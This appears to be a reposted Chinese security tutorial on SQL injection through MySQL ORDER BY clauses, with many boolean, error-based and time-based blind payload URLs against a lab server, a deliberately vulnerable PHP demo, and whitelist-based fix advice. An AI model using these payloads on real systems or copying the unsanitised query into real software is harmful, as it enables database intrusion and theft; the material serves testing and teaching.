2. 程式人生 > >Mysql Order By 註入總結

Mysql Order By 註入總結

阿新 發佈:2017-05-21
lmap regexp 通過 img tab 引用 情況 man ide

前言

最近在做一些漏洞盒子後臺項目的總結,在盒子多期眾測項目中,發現註入類的漏洞占比較大。其中Order By註入型的漏洞也占挺大一部分比例,這類漏洞也是白帽子樂意提交的類型(獎金高、被過濾概率小)。今天給大家分享下一些關於Order By的有趣的經驗。

何為order by 註入

本文討論的內容指可控制的位置在order by子句後,如下order參數可控:select * from goods order by $_GET[‘order‘]

註入簡單判斷

在早期註入大量存在的時候,利用order by子句進行快速猜解表中的列數,再配合union select語句進行回顯。在測試時,測試者可以通過修改order

參數值,比如調整為較大的整型數,再依據回顯情況來判斷具體表中包含的列數。

在不知道列名的情況下可以通過列的的序號來指代相應的列。但是經過測試這裏無法做運算,如order=3-1order=2是不一樣的。

技術分享

http://192.168.239.2:81/?order=11 錯誤
http://192.168.239.2:81/?order=1 正常

進一步構造Payload

前面的判斷並不是絕對的,我們需要構造出類似and 1=1and 1=2的Payload以便於註入出數據。

技術分享

http://192.168.239.2:81/?order=IF(1=1,name,price) 通過name字段排序
http://192.168.239.2:81/?order=IF(1=2,name,price) 通過price字段排序

 
/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通過name字段排序
/?order=(CASE+WHEN+(1=2)+THEN+name+ELSE+price+END) 通過price字段排序

http://192.168.239.2:81/?order=IFNULL(NULL,price) 通過price字段排序
http://192.168.239.2:81/?order=IFNULL(NULL,name) 通過name字段排序

另外利用rand函數也能達到類似的效果,可以觀測到排序的結果不一樣

http://192.168.239.2:81/?order=rand(1=1) 
http://192.168.239.2:81/?order=rand(1=2)

利用報錯

在有些情況下無法知道列名,而且也不太直觀的去判斷兩次請求的差別,如下用IF語句為例。

返回多條記錄

http://192.168.239.2:81/?order=IF(1=1,1,(select+1+union+select+2)) 正確
http://192.168.239.2:81/?order=IF(1=2,1,(select+1+union+select+2)) 錯誤

/?order=IF(1=1,1,(select+1+from+information_schema.tables)) 正常
/?order=IF(1=2,1,(select+1+from+information_schema.tables)) 錯誤

利用regexp

http://192.168.239.2:81/?order=(select+1+regexp+if(1=1,1,0x00)) 正常
http://192.168.239.2:81/?order=(select+1+regexp+if(1=2,1,0x00)) 錯誤

利用updatexml

http://192.168.239.2:81/?order=updatexml(1,if(1=1,1,user()),1) 正確
http://192.168.239.2:81/?order=updatexml(1,if(1=2,1,user()),1) 錯誤

利用extractvalue

http://192.168.239.2:81/?order=extractvalue(1,if(1=1,1,user())) 正確
http://192.168.239.2:81/?order=extractvalue(1,if(1=2,1,user())) 錯誤

基於時間的盲註

註意如果直接if(1=2,1,SLEEP(2)),sleep時間將會變成2當前表中記錄的數目,還有比如執行BENCHMARK(1000000,100100);等函數,將會對服務器造成一定的拒絕服務攻擊。

技術分享

/?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) 正常響應時間
/?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) sleep 2秒

數據猜解

以猜解user()[email protected]為例子,由於只能一位一位猜解,可以利用SUBSTR,SUBSTRING,MID,以及leftright可以精準分割出每一位子串。然後就是比較操作了可以利用=,like,regexp等。這裏要註意like是不區分大小寫。

通過下可以得知user()第一位為r,ascii碼的16進制為0x72

http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) 正確
http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) 錯誤

猜解當前數據庫的表名:

/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00)) 正確
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 錯誤

猜解指定表名中的列名:

/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) 正常
/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) 錯誤

sqlmap測試

在沒有過濾的情況下是能夠檢測到註入的,如下圖:

技術分享

附錄服務端代碼

<?php
error_reporting(0);
session_start();
mysql_connect("127.0.0.1", "root", "root") or die("Database connection failed ");
mysql_select_db("sqlidemo") or die("Select database failed");

$order = $_GET[‘order‘] ? $_GET[‘order‘] : ‘name‘;
$sql = "select id,name,price from goods order by $order";
$result = mysql_query($sql);
$reslist = array();
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
 array_push($reslist, $row);
}
echo json_encode($reslist);
create database sqlidemo;

use sqlidemo;
create table goods (id int(4) not null primary key auto_increment, name char(32) not null, price int(4) not null);
insert into goods (name, price) values("apple", 10);
insert into goods (name, price) values("banana", 15);
insert into goods (name, price) values("peach", 20);

修復建議

這個問題的是由於攻擊者通過測試,了解到應用程序對數據對象進行了直接引用。該類問題可以歸納到OWASP-2013中A4(不安全的對象直接引用)。常見的修復方法如下:

1.通過正則表達式進行字符串過濾。只允許字段中出現字母、數字、下劃線。

2.通過白名單思路,使用間接對象引用。前端傳遞引用數字或者字符串等,用於與後端做數組映射,這樣可以隱藏數據庫數據字典效果,避免直接引用帶來的危害。

 <?php 
 $orderby_whitelist = array(  
    "apple" => "apple ASC",  
    "applerev" => "apple DESC", 
    "daterev" => "banana DESC", 
    "DEFAULT" => "peach"
 ); 
 $order = isset($_GET["order"]) ? $_GET["order"] : "DEFAULT";
$order_expr = array_key_exists($order, $orderby_whitelist) ? $orderby_whitelist[$order] : $orderby_whitelist["DEFAULT"]; 
mysql_query("SELECT ... FROM ... ORDER BY $order_expr");

參考資料

http://xdxd.love/2016/03/07/order-by%E6%B3%A8%E5%85%A5%E7%82%B9%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F/

https://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html

https://dev.mysql.com/doc/refman/5.7/en/string-functions.html

Mysql Order By 註入總結

相關推薦

Mysql Order By 總結

lmap regexp 通過 img tab 引用 情況 man ide 前言 最近在做一些漏洞盒子後臺項目的總結,在盒子多期眾測項目中,發現註入類的漏洞占比較大。其中Order By註入型的漏洞也占挺大一部分比例,這類漏洞也是白帽子樂意提交的類型(獎金高、被過濾概率小)

sqli-labs(十六)(order by)

之前 order by www. 分享 extra 執行 value 四十七 sleep 第四十六關: http://www.bubuko.com/infodetail-2481914.html 這有篇文章講得還不錯可以看下 這關是order by後面的一個註入,用報錯註入

1015.WebGoat SQLOrder by解題思路

使用 如果 tar osi items hist lec WebG options ★ Order by 註入本文所說的 Order by註入的題目在:Injection Flaws -> SQL injection(mitigation) -> 第8頁的題目

網站mysql防止sql*** 3種方法總結

詳細 pro 直接 coo ado 問題總結 color 都在 數據庫盲註 mysql數據庫一直以來都遭受到sql註入***的影響,很多網站,包括目前的PC端以及手機端都在使用php+mysql數據庫這種架構,大多數網站受到的***都是與sql註入***有關,那麽mysql

Mysql Order By注入總結

何為order by 注入 本文討論的內容指可控制的位置在order by子句後,如下order引數可控"select * from goods order by $_GET['order']" 簡單注入判斷 在早期注入大量存在的時候利用order by子句進行快速猜解列數,再配合union select語

mysql order by limit 問題

name hsb 出現 .cn cnblogs test mit width 1-1 問題 不使用limit時 使用limit出現問題了: 原因是出現相同值 gaoxiong 解決辦法:使用多個字段排序,上述例子可以改成 select * from hsb_test or

mysql防SQL搜集

prepare case when sch pass 字符 ble 失敗 sqli 16進制 SQL註入 例:腳本邏輯 $sql = “SELECT * FROM user WHERE userid = $_GET[userid] “; 案例1:SELECT * F

MYSQL報錯方法整理

ipo poi floor extra 版本 註入 關鍵字 -1 format 1、通過floor暴錯 /*數據庫版本*/ SQL http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*)

SQLmysql顯錯

顯錯註入 sql註入 mysql註入 在我們實際滲透中,明明發現一個註入點,本以為丟給sqlmap就可以了,結果sqlmap只顯示確實是註入點,但是數據庫卻獲取不了,如圖1所示,這時我們可以使用手工進行註入,判斷出過濾規則以及基本過濾情況,然後再選擇對應的sqlmap腳本(如果有的話),本

mysql order by 多個字段

out jsb fonts gravity nts order by water size mar 下圖是只加了一個排序的結果: 可以看到,單一字段是沒問題的。如果加入c2呢?下圖是c2 可以發現,這裏的orderby是先按c1增序,然後對於按c1排好序以後的相同的元素

mysql ORDER BY,GROUP BY 和DISTINCT原理

如果 str reat 個數 需要 是我 如何 where子句 三種 前言 除了常規的Join語句之外,還有一類Query語句也是使用比較頻繁的,那就是ORDERBY,GROUP BY以及DISTINCT這三類查詢。考慮到這三類查詢都涉及到數據的排序等操作,所以我將他們放在

Mysql Order By 字符串排序,mysql 字符串order by

-s 解決方案 tro sign 如果 開始 itl 描述 star Mysql Order By 字符串排序,mysql 字符串order by ============================== ?Copyright 蕃薯耀 2017年9月30日 http

mysql order by多個字段

sel 字段排序 div 默認 sele strong spa 關鍵字 asc Mysql order by 多字段排序 mysql單個字段降序排序: select * from table order by id desc; mysql單個字段升序排序:

SQL報錯總結

字段 name tab extra SQ password get upd 報錯 1.Floor()報錯註入 關於Floor報錯註入原理可以看http://blog.51cto.com/wt7315/1891458 獲取數據庫 select count(*),(conca

form表單mysql防#號

sql 數據庫管理員 總結 但是 term 技術 分享圖片 images use form表單mysql防#號註入 #在mysql中只用來註釋作用,但是它卻很受***歡迎 演示兩種簡單input輸入#號的mysql***: 數據庫管理員賬號user表 第一種(賬號***,密

mysql 帶外

href 參數 ase 路徑 tps 限制 profile () clas 帶外通道 有時候註入發現並沒有回顯,也不能利用時間盲註,那麽就可以利用帶外通道,也就是利用其他協議或者渠道,如http請求、DNS解析、SMB服務等將數據帶出。 payload

mysql order by 中文排序

【中文排序】mysql order by 中文排序 1. 在MySQL中,我們經常會對一個欄位進行排序查詢,但進行中文排序和查詢的時候,對漢字的排序和查詢結果往往都是錯誤的。 這種情況在MySQL的很多版本中都存在。 如果這個問題不解決,那麼MySQL將無法實際處理中文。 出現這個問題的原因

MySQL ORDER BY程式碼筆記

mysql> select * from testB; +----+-------+---------+------------+ | id | name | address | time | +----+-------+---------+------------+ | 1

mysql order by rand() 效率優化方法

                     mysql order by rand() 效率優化方法   轉載:https://blog.csdn.net/fdipzone/

mysql order by field 按指定欄位排序

舉個例子 a表裡有b欄位 b欄位裡有資料-1,1,2,3,4 如果想把4,2,3的排在最前面,其他的排在後面,並且保留4,2,3的順序 sql: select * from a order by FIELD(3,2,4) DESC 如果是這樣寫sql: s